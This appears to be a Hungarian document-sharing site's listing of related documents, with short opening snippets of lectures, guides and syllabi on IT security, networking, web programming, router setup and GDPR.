Adatbiztonság PPZH 2011. május 20. 1. Mutassa meg, hogy a CBC-MAC kulcsolt hashing nem teljesíti az egyirányúság követelményét egy a k kulcsot ismerő fél számára, azaz tetszőleges MAC ellenőrzőösszeghez
RészletesebbenBiztonságos PHP a gyakorlatban
Biztonságos PHP a gyakorlatban Ahhoz, hogy meg tudjuk védeni PHP alkalmazásainkat, az elsõ és legfontosabb lépés a biztonsági veszélyek felismerése és megértése. Az elmúlt két évben a PHP magfejlesztõi
RészletesebbenBevezetés Működési elv AJAX keretrendszerek AJAX
AJAX Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek Áttekintés Bevezetés Működési elv AJAX-ot támogató keretrendszerek
RészletesebbenMIKOVINY SÁMUEL TÉRINFORMATIKAI EMLÉKVERSENY
NYUGAT-MAGYARORSZÁGI EGYETEM GEOINFORMATIKAI KAR MIKOVINY SÁMUEL TÉRINFORMATIKAI EMLÉKVERSENY 2012/2013. TANÉV Az I. FORDULÓ FELADATAI NÉV:... Tudnivalók A feladatlap 4 feladatból áll, melyeket tetszőleges
RészletesebbenNetis vezeték nélküli, N típusú Router Gyors Telepítési Útmutató
Netis vezeték nélküli, N típusú Router Gyors Telepítési Útmutató Tartalomjegyzék 1. A csomag tartalma... 1 2. Hardware csatlakoztatása... 1 3. A router webes felületen történő beüzemelése... 2 4. Hibaelhárítás...
RészletesebbenINFORMATIKAI BIZTONSÁG ALAPJAI
INFORMATIKAI BIZTONSÁG ALAPJAI 8. előadás Göcs László Kecskeméti Főiskola GAMF Kar Informatika Tanszék 2015-16. 1. félév Támadási lehetőségek Az emberi tényező az IT biztonságban Az ember szerepe az IT
RészletesebbenWebtárhely létrehozása a WWW.freeweb.hu helyen. Lépések Teendő 1. Böngészőbe beírni: www.freeweb.hu. 2. Jobb oldalon regisztrálni (tárhelyigénylés).
Lépések Teendő 1. Böngészőbe beírni: www.freeweb.hu Kép 2. Jobb oldalon regisztrálni (tárhelyigénylés). 3. 4. Értelemszerűen kitölteni a regisztrációs lapot, és elküldeni. 5. Postafiókomra érkező levélben
RészletesebbenGDPR az EU Általános Adatvédelmi Rendelete - minden vállalkozás életét érintő jogszabály -
1 GDPR az EU Általános Adatvédelmi Rendelete - minden vállalkozás életét érintő jogszabály - 2018. február 5. Debrecen Keczán Attila rendszergazda 2 GDPR informatikus szemmel Bemutatkozás Adminisztratív
RészletesebbenA T-Online Adatpark és Dataplex hálózati megoldásai
A T-Online Adatpark és Dataplex hálózati megoldásai Gyebnár Krisztián T-Online 2007.02.27. Tartalom A DataCenter logika - fizika DataCenter IP szolgáltatások DataCenter Hálózat Anycast routing A szolgáltatás
RészletesebbenA számítástechnika gyakorlata WIN 2000 I. Szerver, ügyfél Protokoll NT domain, Peer to Peer Internet o WWW oftp opop3, SMTP. Webmail (levelező)
A számítástechnika gyakorlata WIN 2000 I. Szerver, ügyfél Protokoll NT domain, Peer to Peer Internet o WWW oftp opop3, SMTP Bejelentkezés Explorer (böngésző) Webmail (levelező) 2003 wi-3 1 wi-3 2 Hálózatok
Részletesebben10. évfolyam 105 óra 10817-12 azonosító számú Hálózatok, programozás és adatbázis-kezelés 105 óra Adatbázis- és szoftverfejlesztés gyakorlat tantárgy
9. évfolyam 70 óra 10815-12 azonosító számú Információtechnológiai alapok gyakorlat 70 óra Információtechnológiai gyakorlat tantárgy 70 óra Számítógép összeszerelése Számítógép szétszerelése. Pontos konfiguráció
RészletesebbenInformáció és kommunikáció
Információ és kommunikáció Tanmenet Információ és kommunikáció TANMENET- Információ és kommunikáció Témakörök Javasolt óraszám 1. Az internet jellemzői 25 perc 2. Szolgáltatások az interneten 20 perc
RészletesebbenBackupPC. Az /etc/hosts fájlba betehetjük a hosztokat, ha nem a tejles (fqdn, DNS név) névvel hivatkozunk rájuk: # /etc/hosts #... 192.168.1.
BackupPC Bevezető A BackupPC számítógépek (szerver és munkaállomások) mentését megvalósító szoftver. Legfontosabb jellemzője, hogy távoli mentést alkalmaz smb, ftp, ssh/rsync segítségével. A szoftver perl
RészletesebbenMértékegységek a számítástechnikában
Mértékegységek a számítástechnikában BIT legkisebb adattárolási egység Értékei lehetnek: 0,1. Bájt= 8 BIT a számítógép számára egységesen kezelhető legkisebb egység. (Bit,) Bájt, KiloBájt, MegaBájt, GigaBájt,
RészletesebbenSzilipet programok telepítése Hálózatos (kliens/szerver) telepítés Windows 7 operációs rendszer alatt
Szilipet programok telepítése Hálózatos (kliens/szerver) telepítés Windows 7 operációs rendszer alatt segédlet A Szilipet programok az adatok tárolásához Firebird adatbázis szervert használnak. Hálózatos
RészletesebbenELEKTRONIKUS MUNKABÉRJEGYZÉK MODUL
ELEKTRONIKUS MUNKABÉRJEGYZÉK MODUL nexonbér elektronikus munkabérjegyzék modul Kiszámolta már valaha, hogy mennyibe kerül egyetlen munkavállaló egyetlen havi munkabérjegyzéke (a nyomtatás, a borítékolás
RészletesebbenSZÓBELI ÉRETTSÉGI TÉMAKÖRÖK
INFORMATIKA SZÓBELI ÉRETTSÉGI TÉMAKÖRÖK Az emelt szint a középszint követelményeit magában foglalja, de azokat magasabb szinten kéri számon. 1. Információs társadalom 2. Informatikai alapismeretek - hardver
RészletesebbenIzsó Krisztián Péti Zoltán. Cisco Identity Services Engine
Izsó Krisztián Péti Zoltán Cisco Identity Services Engine Bevezetés Szakképzett informatikusok számának növekedése Biztonságosnak tűnő rendszerek jobb átláthatósága Sérülékenységek, hibák napvilágra kerülése
RészletesebbenXSS férgek és vírusok
XSS férgek és vírusok 1. Bevezetés: XSS 2. Bevezetés: féreg és vírus különbség 3. Felhasználhatóság 4. Fertőzés, terjeszkedés 5. Proof of Concept 6. Eltávolítás és Védekezés 1. Bevezetés: XSS Ez a paper
Részletesebben3 A hálózati kamera beállítása LAN hálózaton keresztül
Hikvision IP kamera Gyorsindítási útmutató 3 A hálózati kamera beállítása LAN hálózaton keresztül Megjegyzés: A kezelő tudomásul veszi, hogy a kamera internetes vezérlése hálózati biztonsági kockázatokkal
RészletesebbenSzámítógép hálózatok
Számítógép hálózatok Számítógép hálózat fogalma A számítógép-hálózatok alatt az egymással kapcsolatban lévő önálló számítógépek rendszerét értjük. Miért építünk hálózatot? Információ csere lehetősége Központosított
RészletesebbenOO PDO. Tehát PDO használatával, könnyen átállhatunk egy másik adatbáziskezelőre, anélkül hogy a kódot teljes egészében újraírnánk.
OO PDO PDO VS MYSQLi VS MYSQL ================================================================================ A PHP mysql metódusai elavultak, helyette lehet hazsnálni a MYSQLi metódusokat, amelyek szinte
RészletesebbenNyilvántartási Rendszer
Nyilvántartási Rendszer Veszprém Megyei Levéltár 2011.04.14. Készítette: Juszt Miklós Honnan indultunk? Rövid történeti áttekintés 2003 2007 2008-2011 Access alapú raktári topográfia Adatbázis optimalizálás,
RészletesebbenRIA Rich Internet Application
Áttekintés RIA Rich Internet Application Komplex felhasználói felülettel rendelkező web-alkalmazások Bevezető Flex áttekintés ActionScript Felhasználói felület tervezése Események Szerver oldali szolgáltatásokkal
RészletesebbenNetis Vezetékes ADSL2+, N Modem Router Gyors Telepítési Útmutató
Netis Vezetékes ADSL2+, N Modem Router Gyors Telepítési Útmutató Modell szám: DL4201 Tartalomjegyzék 1. A csomag tartalma... 1 2. Hardware csatlakoztatása... 1 3. A modem webes felületen történő beüzemelése...
RészletesebbenFlash és PHP kommunikáció. Web Konferencia 2007 Ferencz Tamás Jasmin Media Group Kft
Flash és PHP kommunikáció Web Konferencia 2007 Ferencz Tamás Jasmin Media Group Kft A lehetőségek FlashVars External Interface Loadvars XML SOAP Socket AMF AMFphp PHPObject Flash Vars Flash verziótól függetlenül
RészletesebbenTartalom. I. Rész A számítógép megosztása 5. Bevezetés 1. 1 n Saját profilt mindenkinek 7. Biztonsági programok 3 A könyvben használt jelek 4
Bevezetés 1 A könyv felépítése 2 Biztonsági programok 3 A könyvben használt jelek 4 I. Rész A számítógép megosztása 5 1 n Saját profilt mindenkinek 7 Alapfogalmak 8 Hogyan mûködik? 8 Biztonság 9 Felhasználói
RészletesebbenSyllabus 1.0 Ez a dokumentum részletesen ismerteti az ECDL IT-biztonság modult és megfelelő alapokat ad az elméleti és gyakorlati vizsgához is.
Syllabus 1.0 Ez a dokumentum részletesen ismerteti az ECDL IT-biztonság modult és megfelelő alapokat ad az elméleti és gyakorlati vizsgához is. A modul célja Az IT-biztonság ECDL modul célja, hogy a vizsgázó
RészletesebbenA DOLLÁROS PIZZA TÖRTÉNETE, AVAGY MENNYIT ÉR A BITCOIN?
A 40.000.000 DOLLÁROS PIZZA TÖRTÉNETE, AVAGY MENNYIT ÉR A BITCOIN? Sándor Barnabás biztonságtechnikai mérnök, etikus hacker Budapest, 2019. március 19. Péztörténet Időutazás 2004 Sándor Barnabás 2007 Fazekas+
RészletesebbenSQL*Plus. Felhasználók: SYS: rendszergazda SCOTT: demonstrációs adatbázis, táblái: EMP (dolgozó), DEPT (osztály) "közönséges" felhasználók
SQL*Plus Felhasználók: SYS: rendszergazda SCOTT: demonstrációs adatbázis, táblái: EMP dolgozó), DEPT osztály) "közönséges" felhasználók Adatszótár: metaadatokat tartalmazó, csak olvasható táblák táblanév-prefixek:
RészletesebbenIT-biztonság Syllabus 1.0 A syllabus célja 2014 ECDL Alapítvány Jogi nyilatkozat A modul célja
IT-biztonság Syllabus 1.0 A syllabus célja Ez a dokumentum részletesen ismerteti az IT-biztonság modult és megfelelő alapokat ad az elméleti és gyakorlati vizsgához is. 2014 ECDL Alapítvány A syllabus
RészletesebbenDr. Pál László, Sapientia EMTE, Csíkszereda WEB PROGRAMOZÁS 5.ELŐADÁS. Sütik és munkamenetek kezelése 2015-2016
Dr. Pál László, Sapientia EMTE, Csíkszereda WEB PROGRAMOZÁS 5.ELŐADÁS 2015-2016 Sütik és munkamenetek kezelése A HTTP protokoll Emlékeztető 2 A HTTP protokoll állapotmentes Nem emlékezik az előző kérés
RészletesebbenÁltalános e-mail fiók beállítási útmutató
Általános e-mail fiók beállítási útmutató Ennek az összeállításnak az a célja, hogy segítséget nyújtsunk azon Ügyfeleink számára, akik az IntroWeb Kft. által nyújtott e-mail szolgáltatáshoz be szeretnék
RészletesebbenHargitai Zsolt Novell Mo.
NetMail skálázható, szabványos levelezőrendszer Hargitai Zsolt Novell Mo. zhargitai@novell.hu Mi a NetMail? A NetMail egy szabványos levelező rendszer naptárkezeléssel. A NetMail az alábbi szabványokat
RészletesebbenEgészítsük ki a Drupal-t. Drupal modul fejlesztés
Egészítsük ki a Drupal-t Drupal modul fejlesztés Drupal 6.0 2008. február 13. Miért írjunk Drupal modult? Nincs az igényeinknek megfelelő modul Valamilyen közösségi igény kielégítése Valami nem úgy működik
Részletesebben